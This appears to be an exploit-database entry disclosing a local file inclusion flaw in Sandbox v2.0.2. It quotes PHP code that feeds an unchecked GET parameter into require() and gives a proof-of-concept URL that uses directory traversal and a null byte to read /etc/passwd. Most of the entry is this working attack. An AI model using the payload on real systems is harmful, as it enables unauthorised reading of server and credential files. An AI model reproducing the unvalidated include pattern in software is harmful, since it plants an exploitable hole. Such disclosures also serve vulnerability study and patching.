id: 12820
date: 07/04/2010
title: Sandbox v2.0.2 Local FIle Inclusion Vulnerability
author: saudi0hacker
cves: 

=================================================
Sandbox v2.0.2 Local FIle Inclusion Vulnerability
=================================================


: # Tested on: Linux os                                                    :
: # Greetz to : pr.al7rbi : so busy : evil-ksa : Dr.dakota : v4-team.com   :
----------------------------------------------------------------------------
 
 [+] file:index.php on line 75
 [+] Code:
 <?
 else {
    $module = $_GET['a'];
 }
 
 require 'modules/'  . $module . '.php';
 ?>
 
 [+] PoC:http://localhost/index.php?a=../../../../../etc/passwd%00



#  0day.today [2023-03-26]  #